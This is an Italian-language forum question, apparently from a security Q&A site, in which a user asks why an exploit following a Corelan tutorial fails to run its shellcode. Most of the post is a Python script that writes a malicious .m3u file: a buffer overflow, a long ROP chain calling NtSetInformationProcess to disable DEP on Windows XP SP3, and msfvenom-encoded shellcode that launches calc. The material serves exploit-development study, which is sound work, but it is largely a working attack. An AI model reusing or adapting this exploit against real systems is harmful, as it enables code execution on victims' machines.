Bypass DEP utilizzando NtSetInformationProcess sull'ultimo aggiornamento di Windows XP SP3 Pro

3

Seguendo l'esempio di Corelan Team ROP versione 2 (ero in grado di eseguire la versione 1): link

Sono stato in grado di produrre questo exploit:

import struct
f = open("kill.m3u", "w")
buf = ""
# 33764832 [*] Exact match at offset 6098
buf += "A" * (20000 + 6098 - 2 - 4 - 8)
buf += struct.pack("<I", 0x100102DC) # any ret is good
buf += "AAAA"

# --------------START:saving stack pointer and jumping over the parameters -------------------#
# 5AD79277   54               PUSH ESP
# 5AD79278   8BC2             MOV EAX,EDX
# 5AD7927A   5F               POP EDI
# 5AD7927B   C3               RETN
buf += struct.pack("<I", 0x5AD79277)
# 77C1E842   57               PUSH EDI
# 77C1E843   58               POP EAX
# 77C1E844   5D               POP EBP
# 77C1E845   C3               RETN
buf += struct.pack("<I", 0x77C1E842)
buf += "AAAA"
# --------------END:saving stack pointer and jumping over the parameters -------------------#

# 1001653D   83C4 20          ADD ESP,20
# 10016540   C3               RETN
buf += struct.pack("<I", 0x1001653D)

# --------------START: Parameters for NtSetInformationProcess() ---------------------------#
buf += struct.pack("<I", 0x7C90DC9E) # NtSetInformationProcess() cu 5 parametrii
buf += "AAAA" # adresa shellcode EX: 0010F870 => 70 f8 10 00
buf += struct.pack("<I", 0xFFFFFFFF) # 0xFFFFFFFF
buf += "CCCC" # 0x22
buf += "DDDD" # Pointer to 0x00000002, may be a static address hardcoded in your sploit, but must be writeable
buf += "EEEE" # Static value, set to 0x4
buf += "H" * 8
# --------------END: Parameters for NtSetInformationProcess() ---------------------------#
# 0x01937BE5 lands here



# --------------START: crafting the first parameter (return address) -----------------------#
# 763C982F   87FE             XCHG ESI,EDI
# 763C9831   FFC9             DEC ECX
# 763C9833   C2 0400          RETN 4
buf += struct.pack("<I", 0x763C982F) # But before we can use this instruction, we have to put the right value into ESI.
# 77504CB3   05 0C020000      ADD EAX,20C = 524
# 77504CB8   C3               RETN

# 775E16DD   05 3C020000      ADD EAX,23C = 572
# 775E16E2   C3               RETN
# 77C1C8F0   83C0 20          ADD EAX,20
# 77C1C8F3   5D               POP EBP
# 77C1C8F4   C3               RETN



buf += struct.pack("<I", 0x775E16DD) # increment with 572 bytes (increase EAX)
buf += struct.pack("<I", 0x77C1C8F0) # increment with 572 bytes (increase EAX)

# 77E841DA   8946 10          MOV DWORD PTR DS:[ESI+10],EAX
# 77E841DD   8BC6             MOV EAX,ESI
# 77E841DF   5E               POP ESI
# 77E841E0   C3               RETN
buf += struct.pack("<I", 0x77E841DA) # Next, we need to write this value onto the stack, overwriting the placeholder (which currently contains "AAAA")
buf += "AAAA"
# --------------END: crafting the first parameter (return address) -----------------------#

# --------------START: generate the value for the third parameter (0x22) ----------------#
# 775D177F   50               PUSH EAX
# 775D1780   5E               POP ESI
# 775D1781   C3               RETN
buf += struct.pack("<I", 0x775D177F) # At the current time, EAX still holds the initial saved stack pointer. We have to put it back in ESI.
#increase ESI with 4 (second parameter)
# 77C12809   46               INC ESI
# 77C1280A   C3               RETN
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
#increase ESI with 4 (for third parameter becouse the second is harcoded to simplify things)
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1

buf += struct.pack("<I", 0x77E841DA) # Next, we need to write this value onto the stack, overwriting the placeholder (which currently contains "CCCC")
buf += "AAAA"
buf += struct.pack("<I", 0x775D177F)
# 100307A9   33C0             XOR EAX,EAX
# 100307AB   C3               RETN
buf += struct.pack("<I", 0x100307A9) # zero out eax
# 1002DC41   83C0 40          ADD EAX,40
# 1002DC44   5D               POP EBP
# 1002DC45   C3               RETN
buf += struct.pack("<I", 0x1002DC41)
buf += "AAAA"
# 10027D2E   83C0 FE          ADD EAX,-2
# 10027D31   5D               POP EBP
# 10027D32   C3               RETN
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x10027D2E) # 2e 7d 02 10
buf += "AAAA"
buf += struct.pack("<I", 0x77E841DA) # Next, we need to write this value onto the stack, overwriting the placeholder (which currently contains "CCCC")
buf += "AAAA"
# --------------END: generate the value for the third parameter (0x22) ----------------#

# --------------START: generate the value for the 4th parameter (0x00000002) ----------------#
# 775D177F   50               PUSH EAX
# 775D1780   5E               POP ESI
# 775D1781   C3               RETN
buf += struct.pack("<I", 0x775D177F) # At the current time, EAX still holds the initial saved stack pointer. We have to put it back in ESI.
#increase ESI with 4 (second parameter)
# 77C12809   46               INC ESI
# 77C1280A   C3               RETN
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77E841DA) # Next, we need to write this value onto the stack, overwriting the placeholder (which currently contains "DDDD")
buf += "AAAA"
buf += struct.pack("<I", 0x775D177F)
# 100307A9   33C0             XOR EAX,EAX
# 100307AB   C3               RETN
buf += struct.pack("<I", 0x100307A9)
# 77EA1767   83C0 02          ADD EAX,2
# 77EA176A   C3               RETN
buf += struct.pack("<I", 0x77EA1767)
buf += struct.pack("<I", 0x77E841DA) # Next, we need to write this value onto the stack, overwriting the placeholder (which currently contains "DDDD")
buf += "AAAA"
# --------------END: generate the value for the 4th parameter (0x00000002) ----------------#

# --------------START: generate the value for the 5th parameter (0x4) ----------------#
# 775D177F   50               PUSH EAX
# 775D1780   5E               POP ESI
# 775D1781   C3               RETN
buf += struct.pack("<I", 0x775D177F) # At the current time, EAX still holds the initial saved stack pointer. We have to put it back in ESI.
#increase ESI with 4 (second parameter)
# 77C12809   46               INC ESI
# 77C1280A   C3               RETN
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77C12809) # +1
buf += struct.pack("<I", 0x77E841DA) # Next, we need to write this value onto the stack, overwriting the placeholder (which currently contains "EEEE")
buf += "AAAA"
buf += struct.pack("<I", 0x775D177F)
# 100307A9   33C0             XOR EAX,EAX
# 100307AB   C3               RETN
buf += struct.pack("<I", 0x100307A9)
# 77EA1767   83C0 02          ADD EAX,2
# 77EA176A   C3               RETN
buf += struct.pack("<I", 0x77EA1767)
# 77EA1767   83C0 02          ADD EAX,2
# 77EA176A   C3               RETN
buf += struct.pack("<I", 0x77EA1767)
buf += struct.pack("<I", 0x77E841DA) # Next, we need to write this value onto the stack, overwriting the placeholder (which currently contains "EEEE")
buf += "AAAA"
# --------------END: generate the value for the 5th parameter (0x4) ----------------#

# --------------START: Last step of ROP = jump to NtSetInformationProcess ----------------#
# 775D1752   83E8 04          SUB EAX,4
# 775D1755   C3               RETN
buf += struct.pack("<I", 0x775D1752)
buf += struct.pack("<I", 0x775D1752)
buf += struct.pack("<I", 0x775D1752)
# 73DF37E4   50               PUSH EAX
# 73DF37E5   5C               POP ESP
# 73DF37E6   8BC7             MOV EAX,EDI
# 73DF37E8   5F               POP EDI
# 73DF37E9   5E               POP ESI
# 73DF37EA   C3               RETN
buf += struct.pack("<I", 0x73DF37E4)


# --------------END: Last step of ROP = jump to NtSetInformationProcess ----------------#
# total kill of DEP
buf += "\x90" * (199 + 5)
#76E82313   FFE4             JMP ESP
# msfvenom -a x86 --platform windows -p windows/exec CMD='calc' --encoder x86/alpha_mixed -f py
buf += "\x89\xe6\xdb\xcb\xd9\x76\xf4\x5b\x53\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x39\x78\x4c"
buf += "\x42\x73\x30\x33\x30\x45\x50\x45\x30\x4e\x69\x38\x65"
buf += "\x36\x51\x6f\x30\x62\x44\x4c\x4b\x70\x50\x66\x50\x4c"
buf += "\x4b\x36\x32\x74\x4c\x6e\x6b\x32\x72\x42\x34\x4c\x4b"
buf += "\x63\x42\x35\x78\x66\x6f\x48\x37\x31\x5a\x65\x76\x30"
buf += "\x31\x39\x6f\x6c\x6c\x45\x6c\x70\x61\x33\x4c\x64\x42"
buf += "\x64\x6c\x67\x50\x59\x51\x5a\x6f\x66\x6d\x45\x51\x58"
buf += "\x47\x59\x72\x59\x62\x70\x52\x61\x47\x4e\x6b\x76\x32"
buf += "\x76\x70\x6c\x4b\x63\x7a\x37\x4c\x6c\x4b\x52\x6c\x72"
buf += "\x31\x54\x38\x38\x63\x70\x48\x53\x31\x48\x51\x36\x31"
buf += "\x6c\x4b\x71\x49\x55\x70\x63\x31\x38\x53\x6c\x4b\x51"
buf += "\x59\x74\x58\x68\x63\x45\x6a\x71\x59\x6c\x4b\x35\x64"
buf += "\x4e\x6b\x47\x71\x7a\x76\x34\x71\x69\x6f\x4e\x4c\x4f"
buf += "\x31\x38\x4f\x56\x6d\x73\x31\x4a\x67\x55\x68\x4d\x30"
buf += "\x51\x65\x78\x76\x56\x63\x43\x4d\x39\x68\x65\x6b\x71"
buf += "\x6d\x57\x54\x44\x35\x38\x64\x30\x58\x6e\x6b\x53\x68"
buf += "\x31\x34\x76\x61\x78\x53\x43\x56\x6c\x4b\x66\x6c\x52"
buf += "\x6b\x4e\x6b\x66\x38\x45\x4c\x57\x71\x69\x43\x4c\x4b"
buf += "\x37\x74\x6e\x6b\x46\x61\x4e\x30\x6e\x69\x33\x74\x46"
buf += "\x44\x47\x54\x43\x6b\x51\x4b\x43\x51\x30\x59\x52\x7a"
buf += "\x43\x61\x79\x6f\x6d\x30\x63\x6f\x73\x6f\x62\x7a\x6c"
buf += "\x4b\x65\x42\x78\x6b\x6c\x4d\x51\x4d\x72\x4a\x56\x61"
buf += "\x6e\x6d\x4f\x75\x6d\x62\x67\x70\x67\x70\x67\x70\x76"
buf += "\x30\x32\x48\x64\x71\x4e\x6b\x72\x4f\x6c\x47\x4b\x4f"
buf += "\x38\x55\x6d\x6b\x4c\x30\x4c\x75\x4f\x52\x53\x66\x50"
buf += "\x68\x6f\x56\x6a\x35\x4d\x6d\x6f\x6d\x79\x6f\x6b\x65"
buf += "\x57\x4c\x45\x56\x63\x4c\x56\x6a\x4b\x30\x4b\x4b\x49"
buf += "\x70\x52\x55\x63\x35\x6f\x4b\x72\x67\x44\x53\x52\x52"
buf += "\x30\x6f\x51\x7a\x67\x70\x66\x33\x69\x6f\x7a\x75\x71"
buf += "\x73\x75\x31\x62\x4c\x45\x33\x43\x30\x41\x41"
buf += "\x90" * (27000 - len(buf))
print len(buf)
f.write(buf)
f.close()

Dopo questo lungo ROP ho ottenuto un salto ma non un'esecuzione dello shellcode mentre sto ricevendo questo messaggio:

Suquesto:

Ho fatto qualcosa di sbagliato o qualcosa di nuovo?

    
posta Lucian Nitescu 06.09.2017 - 02:16
fonte

0 risposte

Leggi altre domande sui tag